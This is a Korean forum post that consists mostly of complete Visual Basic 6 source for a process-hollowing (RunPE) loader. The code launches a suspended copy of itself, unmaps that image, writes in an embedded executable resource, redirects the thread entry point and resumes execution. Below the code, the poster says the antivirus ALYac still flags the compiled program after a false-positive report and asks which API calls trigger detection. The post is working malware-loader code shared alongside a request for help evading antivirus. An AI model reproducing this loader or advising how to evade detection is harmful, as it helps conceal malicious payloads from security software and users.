수다닷컴

attribute vb_name = submain
private declare function getmodulefilename lib kernel32.dll alias getmodulefilenamea (byval hmodule as long, byval lpfilename as string, byval nsize as long) as long
private declare function createprocess lib kernel32.dll alias createprocessa (byval lpapplicationname as string, byval lpcommandline as string, byref lpprocessattributes as any, byref lpthreadattributes as any, byval binherithandles as long, byval dwcreationflags as long, byref lpenvironment as any, byval lpcurrentdriectory as string, byref lpstartupinfo as startupinfo, byref lpprocessinformation as process_information) as long
private declare function closehandle lib kernel32.dll (byval hobject as long) as long
private declare function virtualallocex lib kernel32.dll (byval hprocess as long, byref lpaddress as any, byval dwsize as long, byval flallocationtype as long, byval flprotect as long) as long
private declare function virtualprotectex lib kernel32.dll (byval hprocess as long, byref lpaddress as any, byval dwsize as long, byval flnewprotect as long, byref lpfloldprotect as long) as long
private declare function zwunmapviewofsection lib ntdll.dll (byval processhandle as long, byref baseaddress as any) as long
private declare function getthreadcontext lib kernel32.dll (byval hthread as long, byref lpcontext as context) as long
private declare function setthreadcontext lib kernel32.dll (byval hthread as long, byref lpcontext as context) as long
private declare function terminateprocess lib kernel32.dll (byval hprocess as long, byval uexitcode as long) as long
private declare function readprocessmemory lib kernel32.dll (byval hprocess as long, byref lpbaseaddress as any, byref lpbuffer as any, byval nsize as long, byref lpnumberofbytesread as long) as long
private declare function writeprocessmemory lib kernel32.dll (byval hprocess as long, byref lpbaseaddress as any, byref lpbuffer as any, byval nsize as long, byref lpnumberofbyteswritten as long) as long
private declare function resumethread lib kernel32.dll (byval hthread as long) as long
private declare function exitprocess lib kernel32.dll (byval exitcode as long) as long
private declare sub rtlmovememory lib kernel32.dll (byref destination as any, byref source as any, byval length as long)
private const status_success& = 0&
private const create_suspended& = 4&
private const context_full& = 65543
private const mem_commit& = &h1000&
private const mem_reserve& = &h2000&
private const page_noaccess& = &h1
private const page_readonly& = &h2
private const page_readwrite& = 4&
private const page_execute& = &h10
private const page_execute_read& = &h20
private const page_execute_readwrite& = &h40
private const image_scn_mem_read& = &h40000000
private const image_scn_mem_write& = &h80000000
private const image_scn_mem_execute& = &h20000000
private type startupinfo
cb as long
lpreserved as long
lpdesktop as long
lptitle as long
dwx as long
dwy as long
dwxsize as long
dwysize as long
dwxcountchars as long
dwycountchars as long
dwfillattribute as long
dwflags as long
wshowwindow as integer
cbreserved2 as integer
lpreserved2 as byte
hstdinput as long
hstdoutput as long
hstderror as long
end type
private type process_information
hprocess as long
hthread as long
dwprocessid as long
dwthreadid as long
end type
private type floating_save_area
controlword as long
statusword as long
tagword as long
erroroffset as long
errorselector as long
dataoffset as long
dataselector as long
registerarea(79) as byte
cr0npxstate as long
end type
private type context
contextflags as long
dr0 as long
dr1 as long
dr2 as long
dr3 as long
dr6 as long
dr7 as long
floatsave as floating_save_area
seggs as long
segfs as long
seges as long
segds as long
edi as long
esi as long
ebx as long
edx as long
ecx as long
eax as long
ebp as long
eip as long
segcs as long
eflags as long
esp as long
segss as long
extendedregisters(511) as byte
end type
private type image_dos_header
e_magic as integer
e_cblp as integer
e_cp as integer
e_crlc as integer
e_cparhdr as integer
e_minalloc as integer
e_maxalloc as integer
e_ss as integer
e_sp as integer
e_csum as integer
e_ip as integer
e_cs as integer
e_lfarlc as integer
e_ovno as integer
e_res(3) as integer
e_oemid as integer
e_oeminfo as integer
e_res2(9) as integer
e_lfanew as long
end type
private type image_file_header
machine as integer
numberofsections as integer
timedatestamp as long
pointertosymboltable as long
numberofsymbols as long
sizeofoptionalheader as integer
characteristics as integer
end type
private type image_data_directory
virtualaddress as long
size as long
end type
private type image_optional_header
magic as integer
majorlinkerversion as byte
minorlinkerversion as byte
sizeofcode as long
sizeofinitializeddata as long
sizeofuninitializeddata as long
addressofentrypoint as long
baseofcode as long
baseofdataseofdata as long
imagebase as long
sectionalignment as long
filealignment as long
majoroperatingsystemversion as integer
minoroperatingsystemversion as integer
majorimageversion as integer
minorimageversion as integer
majorsubsystemversion as integer
minorsubsystemversion as integer
win32versionvalue as long
sizeofimage as long
sizeofheaders as long
checksum as long
subsystem as integer
dllcharacteristics as integer
sizeofstackreserve as long
sizeofstackcommit as long
sizeofheapreserve as long
sizeofheapcommit as long
loaderflags as long
numberofrvaandsizes as long
datadirectory(15) as image_data_directory
end type
private type image_nt_headers
signature as long
fileheader as image_file_header
optionalheader as image_optional_header
end type
private type image_section_header
sectionname(7) as byte
virtualsize as long
virtualaddress as long
sizeofrawdata as long
pointerofrawdata as long
pointertorelocations as long
pointertolinenumbers as long
numberofrelocations as integer
numberoflinenumbers as integer
characteristics as long
end type
private const image_dos_signature& = &h5a4d&
private const image_nt_signature& = &h4550&
private sub main()
on error goto unexceptederror
dim filedata() as byte, sfilename as string, si as startupinfo, pi as process_information, hprocess as long, cx as context, imagebaseaddr as long, _
doshdr as image_dos_header, nthdr as image_nt_headers, lpallocmemory as long, psecheader as long, sechdr as image_section_header, sechdrindex as long, protect as long, _
old as long
filedata() = loadresdata(101, custom)
si.cb = len(si)
sfilename = string$(260&, 0)
getmodulefilename 0&, sfilename, 260&
hprocess = createprocess( _
sfilename, _
vbnullstring, _
byval 0&, byval 0&, 0&, _
create_suspended, byval 0&, app.path, _
si, pi)
if hprocess = 0& then
msgbox 프로세스 생성에 실패했습니다., vbcritical, 오류
exitprocess 0
exit sub
end if
cx.contextflags = context_full
if getthreadcontext(pi.hthread, cx) = 0& then
msgbox 쓰레드의 레지스터 정보를 얻어오는 데 실패했습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
if readprocessmemory(pi.hprocess, byval cx.ebx + 8&, imagebaseaddr, 4, byval 0&) = 0& then
msgbox 프로세스의 메모리를 읽어올 수 없었습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
if zwunmapviewofsection(pi.hprocess, byval imagebaseaddr) status_success then
msgbox 프로세스의 이미지를 unmap할 수 없었습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if

rtlmovememory doshdr, filedata(0), len(doshdr)
rtlmovememory nthdr, filedata(doshdr.e_lfanew), len(nthdr)
lpallocmemory = virtualallocex(pi.hprocess, _
byval nthdr.optionalheader.imagebase, _
nthdr.optionalheader.sizeofimage, _
mem_commit or mem_reserve, _
page_readwrite)
if lpallocmemory = 0& then
msgbox 메모리 할당에 실패하였습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
if writeprocessmemory(pi.hprocess, byval cx.ebx + 8&, lpallocmemory, 4, byval 0&) = 0& then
msgbox peb-imagebaseaddress를 쓸 수 없었습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if

if writeprocessmemory(pi.hprocess, _
byval lpallocmemory, _
filedata(0), _
nthdr.optionalheader.sizeofheaders, _
byval 0&) = 0& then
msgbox 이미지를 쓸 수 없었습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
psecheader = varptr(filedata(0)) + doshdr.e_lfanew + len(nthdr)
for sechdrindex = 0 to nthdr.fileheader.numberofsections - 1
rtlmovememory sechdr, byval psecheader + sechdrindex * len(sechdr), len(sechdr)
if writeprocessmemory(pi.hprocess, byval sechdr.virtualaddress + lpallocmemory, filedata(sechdr.pointerofrawdata), sechdr.sizeofrawdata, byval 0&) = 0& then
msgbox 섹션을 쓰는 도중에 오류가 발생했습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
p; exit sub
end if
if sechdr.sizeofrawdata then
if sechdr.characteristics and image_scn_mem_read then
protect = page_readonly
if sechdr.characteristics and image_scn_mem_write then
protect = page_readwrite
if sechdr.characteristics and image_scn_mem_execute then
protect = page_execute_readwrite
end if
else
if sechdr.characteristics and image_scn_mem_execute then
protect = page_execute_read
end if
end if
else
protect = page_noaccess
if sechdr.characteristics and image_scn_mem_execute then
protect = page_execute
end if
end if
if virtualprotectex(pi.hprocess, byval sechdr.virtualaddress + lpallocmemory, sechdr.virtualsize, protect, old) = 0& then
msgbox 섹션 페이지의 보호 옵션을 쓰는 도중에 오류가 발생했습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
end if
next
cx.eax = nthdr.optionalheader.addressofentrypoint + lpallocmemory
if setthreadcontext(pi.hthread, cx) = 0& then
msgbox 대상 쓰레드의 레지스터 정보를 쓸 수 없었습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
if resumethread(pi.hthread) = -1& then
msgbox 대상 쓰레드를 재개할 수 없었습니다., vbcritical, 오류
gosub processcleanup
exitprocess 0
exit sub
end if
exit sub
processcleanup:
terminateprocess pi.hprocess, 0&
closehandle pi.hthread
closehandle pi.hprocess
return
unexceptederror:
gosub processcleanup
exitprocess 0
end sub

수다님의 소스로 프로그램을 컴파일했더니

바이러스래요 그래서

알약에 오진신고했더니 (소스코드 포함)

...

안뜬다네요?

그런데 방금 해보니 뜨네요 업데이트 했는데도요..

어디가 감지되는건지 알수있을까요?

api일까요?

신청하기